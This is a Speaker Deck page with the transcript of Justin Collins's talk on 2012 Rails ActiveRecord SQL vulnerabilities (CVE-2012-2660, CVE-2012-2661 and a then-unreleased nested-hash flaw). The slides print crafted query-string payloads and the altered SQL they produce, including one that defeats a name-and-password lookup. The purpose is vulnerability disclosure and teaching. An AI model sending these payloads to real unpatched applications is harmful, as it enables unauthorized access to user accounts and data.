Upgrade to Pro — share decks privately, control downloads, hide ads and more …

"Recent Rails SQL Issues" - 2012

Avatar for Justin Collins Justin Collins
April 23, 2015
Programming
0
65

"Recent Rails SQL Issues" - 2012

Avatar for Justin Collins

Justin Collins

April 23, 2015
Tweet

More Decks by Justin Collins

See All by Justin Collins
Continuous (Application) Security at DevOps Velocity
Avatar for Justin Collins presidentbeef
0
130
The Evolution of Rails Security
Avatar for Justin Collins presidentbeef
1
780
Brakeman RailsConf 2017 Lightning Talk
Avatar for Justin Collins presidentbeef
0
130
Practical Static Analysis for Continuous Application Security
Avatar for Justin Collins presidentbeef
0
190
"...But Doesn't Rails Take Care of Security for Me?"
Avatar for Justin Collins presidentbeef
1
420
Continuous Security with Practical Static Analysis
Avatar for Justin Collins presidentbeef
1
290
Security Automation at Twitter - Rise of the Machines
Avatar for Justin Collins presidentbeef
0
220
The World of Rails Security - RailsConf 2015
Avatar for Justin Collins presidentbeef
8
1.2k
Tales from the Crypt
Avatar for Justin Collins presidentbeef
1
220

Other Decks in Programming

See All in Programming
AIコーディングエージェントを 「使いこなす」ための実践知と現在地 in ログラス / How to Use AI Coding Agent in Loglass
Avatar for r-kagaya rkaga
4
1.2k
カウシェで Four Keys の改善を試みた理由
Avatar for ike ike002jp
1
120
Jakarta EE Meets AI
Avatar for ivargrimstad ivargrimstad
0
800
カオスに立ち向かう小規模チームの装備の選択〜フルスタックTSという装備の強み _ 弱み〜/Choosing equipment for a small team facing chaos ~ Strengths and weaknesses of full-stack TS~
Avatar for 株式会社ビットキー / Bitkey Inc. bitkey
1
130
flutter_kaigi_mini_4.pdf
Avatar for Hiroki Nobuta nobu74658
0
140
Amazon CloudWatchの地味だけど強力な機能紹介!
Avatar for Tsuyoshi Ito itotsum
0
230
Bedrock × Confluenceで簡単(?)社内RAG
Avatar for iharuoru iharuoru
1
110
fieldalignmentから見るGoの構造体
Avatar for kuro kuro_kurorrr
0
130
Beyond_the_Prompt__Evaluating__Testing__and_Securing_LLM_Applications.pdf
Avatar for Mete Atamel meteatamel
0
110
インプロセスQAにおいて大事にしていること / In-process QA Meetup
Avatar for MEDLEY, INC. medley
0
140
エンジニア向けCursor勉強会 @ SmartHR
Avatar for Yuki Horikoshi yukisnow1823
3
12k
読書シェア会 vol.4 『ダイナミックリチーミング 第2版』
Avatar for Kotaro Kamashima kotaro666
0
110

Featured

See All Featured
Learning to Love Humans: Emotional Interface Design
Avatar for Aarron Walter aarron
273
40k
Building Better People: How to give real-time feedback that sticks.
Avatar for Will Jessup wjessup
367
19k
The World Runs on Bad Software
Avatar for Brandon Keepers bkeepers
PRO
68
11k
Design and Strategy: How to Deal with People Who Don’t "Get" Design
Avatar for Morgane Peng morganepeng
129
19k
Bootstrapping a Software Product
Avatar for Garrett Dimon garrettdimon
PRO
307
110k
Music & Morning Musume
Avatar for Bryan Veloso bryan
47
6.5k
Templates, Plugins, & Blocks: Oh My! Creating the theme that thinks of everything
Avatar for Michelle Schulp Hunt marktimemedia
30
2.3k
Being A Developer After 40
Avatar for Adrian Kosmaczewski akosma
91
590k
実際に使うSQLの書き方 徹底解説 / pgcon21j-tutorial
Avatar for soudai sone soudai
179
53k
How GitHub (no longer) Works
Avatar for Zach Holman holman
314
140k
Building an army of robots
Avatar for Kyle Neath kneath
305
45k
Why You Should Never Use an ORM
Avatar for John Nunemaker jnunemaker
PRO
56
9.3k

Transcript

  1. Rails Vulnerabilities Last Week CVE-2012-2660 CVE-2012-2661

  2. CVE-2012-2660 Allows unexpected “IS NULL” in queries Affects Rails 2.x

    and 3.x

  3. ActiveRecord Query unless params[:name].nil? @user = User.where(:name => params[:name]) end

  4. Query Parameters ?name[] {"name"=>[nil]}

  5. ActiveRecord Query unless [nil].nil? @user = User.where(:name => [nil]) end

  6. Resulting SQL SELECT "users".* FROM "users" WHERE "users"."name" IS NULL

  7. CVE-2012-2661 Allows some manipulation of WHERE clause via “dotted” query

    keys Affects Rails 3.x

  8. ActiveRecord Query User.where(:name => params[:name])

  9. ActiveRecord Query User.where("users.name" => params[:name])

  10. Query Parameters ?name[users.id]=1 {"name"=>{"users.id"=>"1"}}

  11. ActiveRecord Query User.where(:name => {"users.id" => "1"})

  12. Resulting SQL SELECT "users".* FROM "users" WHERE "users"." id" =

    1

  13. Unreleased Vulnerability Allows some manipulation of WHERE clause via nested

    hashes in query values Affects 2.3.x and 3.x

  14. ActiveRecord Query User.where(:name => params[:name], :password => params[:password])

  15. Query Parameters ?name[users][id]=1&password[users][id]=1 {"name"=>{"users"=>{"id"=>"1"}}, "password" =>{"users"=>{"id"=>"1"}}}

  16. ActiveRecord Query User.where( :name => {"users"=>{"id"=>"1"}, :password => {"users"=>{"id"=>"1"} )

  17. Resulting SQL SELECT "users".* FROM "users" WHERE "users"." id" =

    1 AND "users"."id" = 1